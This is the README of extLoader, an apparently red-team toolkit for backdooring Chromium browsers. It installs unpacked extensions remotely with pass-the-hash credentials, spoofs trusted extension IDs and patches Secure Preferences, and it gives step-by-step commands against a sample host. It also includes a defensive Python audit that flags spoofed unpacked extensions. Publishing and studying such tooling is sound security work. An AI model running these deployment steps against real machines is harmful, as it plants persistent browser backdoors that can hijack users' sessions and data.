synacktiv/extloader
extLoader

A small toolkit for managing and deploying unpacked Chromium extensions.

Find out more in the following blogpost: https://www.synacktiv.com/en/publications/the-phantom-extension-backdooring-chrome-through-uncharted-pathways

Installation

Direct install (pipx)

pipx install .
extloader --help

Use pipx for an isolated install targeting Python 3.10+.

Development setup (uv)

uv venv
source .venv/bin/activate
uv pip install -e .

Authentication Options

  • Password: -p/--password
  • Hash: -H/--hash (LM:NT format or just NT)
  • Domain: -d/--domain (defaults to WORKGROUP)

Common Parameters

  • -t, --target: Target IP/hostname
  • -u, --username: Username
  • -i, --index: User index from check command
  • --debug: Enable debug logging

Usage

Here's a step-by-step example of deploying an extension:

  1. First, check available targets:
# This will list available users and browsers
extloader check -t 192.168.1.100 -u admin -H aad3b435b51404eeaad3b435b51404ee:ntlm_hash -d corp.local

┏━━━━━━━━┳━━━━━━━━━━━━━━━━━┳━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┓
┃ Index  ┃ Browser         ┃ User (SID)                                                   ┃
┡━━━━━━━━╇━━━━━━━━━━━━━━━━━╇━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┩
│   1    │ Chrome          │ john.doe (S-1-5-21-4196007090-2879228606-3183820935-1122)    │
│   2    │ Microsoft Edge  │ john.doe (S-1-5-21-4196007090-2879228606-3183820935-1122)    │
└────────┴─────────────────┴──────────────────────────────────────────────────────────────┘

When running exploit from a different machine, always run the check command first to refresh the context (available_targets.json).

  2. Prepare the manifest (sign or spoof an ID):
# Create a deterministic crx_id by adding a key to the manifest.json
extloader sign --extension ./my-extension

To spoof an existing extension ID, skip the command above and set the manifest key to the base64 public key of the extension you are mimicking. Reusing that key keeps the CRX ID unchanged.

  3. Deploy the extension:
# Deploy to user index 1 (Chrome of john.doe)
extloader exploit -t 192.168.1.100 -u admin -H ntlm_hash -i 1 --extension ./my-extension

  4. (Alternative) Package for manual deployment:

# Bundle the signed extension with the captured Preferences file
extloader package --prefs-file "Preferences" --extension-dir ./my-extension --target-dir "C:\\Users\\Public"

# This creates a ZIP containing:
# - Signed extension files
# - Updated preferences files
# - Deployment instructions

--prefs-file expects the browser profile preferences you backed up (Chrome/Edge store them as Secure Preferences, other Chromium browsers use Preferences). The loader copies it, patches it, and includes both the modified and untouched versions in the package.

├── extension/
│   └── chrome-mv3/
├── preferences/
│   ├── brave/
│   ├── chrome/
│   ├── chromium/
    [...]
└── info.json

  5. Restore original preferences if needed:
# Restore original preferences for user index 1 (need check command to get the correct context)
extloader restore -t 192.168.1.100 -u admin -H ntlm_hash -i 1 -f ./backup_preferences
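
Step 2 notes that reusing a manifest key keeps the CRX ID unchanged. That works because Chromium derives the ID from the key alone: SHA-256 of the decoded public key, first 32 hex digits, mapped to the letters a-p. The audit sketch below is an added example, not part of extLoader; it flags unpacked extension directories whose pinned key yields an ID you already trust. The function names, paths, key bytes and inventory are constructed for illustration.

```python
import base64
import hashlib
import json

# Chromium extension IDs use the letters a-p in place of hex digits 0-f.
_HEX_TO_ID = str.maketrans("0123456789abcdef", "abcdefghijklmnop")


def crx_id_from_key(b64_key: str) -> str:
    """Derive the extension ID from a manifest.json "key" value."""
    der = base64.b64decode(b64_key, validate=True)
    return hashlib.sha256(der).hexdigest()[:32].translate(_HEX_TO_ID)


def audit_unpacked(manifests: dict[str, str], trusted_ids: set[str]) -> list[dict]:
    """Flag unpacked extension dirs whose pinned key yields a trusted ID."""
    findings = []
    for path, text in manifests.items():
        key = json.loads(text).get("key")
        if not isinstance(key, str):
            continue  # no pinned key: the ID is derived from the load path instead
        try:
            ext_id = crx_id_from_key(key)
        except ValueError:  # binascii.Error is a ValueError subclass
            findings.append({"path": path, "id": None, "reason": "malformed key"})
            continue
        if ext_id in trusted_ids:
            findings.append({"path": path, "id": ext_id,
                             "reason": "unpacked copy of trusted ID"})
    return findings


# Constructed sample data: the "keys" are placeholder bytes, not real public keys.
STORE_KEY = base64.b64encode(b"constructed-der-public-key-A").decode()
OTHER_KEY = base64.b64encode(b"constructed-der-public-key-B").decode()
TRUSTED_IDS = {crx_id_from_key(STORE_KEY)}  # stands in for your extension inventory
SAMPLE_MANIFESTS = {
    r"C:\Users\Public\my-extension": json.dumps({"name": "x", "key": STORE_KEY}),
    r"C:\dev\internal-tool": json.dumps({"name": "y", "key": OTHER_KEY}),
    r"C:\dev\no-key": json.dumps({"name": "z"}),
    r"C:\dev\bad-key": json.dumps({"name": "w", "key": "%%%not-base64%%%"}),
}

if __name__ == "__main__":
    for finding in audit_unpacked(SAMPLE_MANIFESTS, TRUSTED_IDS):
        print(finding)
```

Feed it the manifest.json of every extension directory found outside the browser-managed Extensions folder, with the IDs from your approved-extension inventory as `trusted_ids`.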

TODO

  • Kerberos support
  • nxc module
  • Adapt package workflow for Linux
  • Adapt package workflow for macOS

About

A chromium extension exploitation toolkit
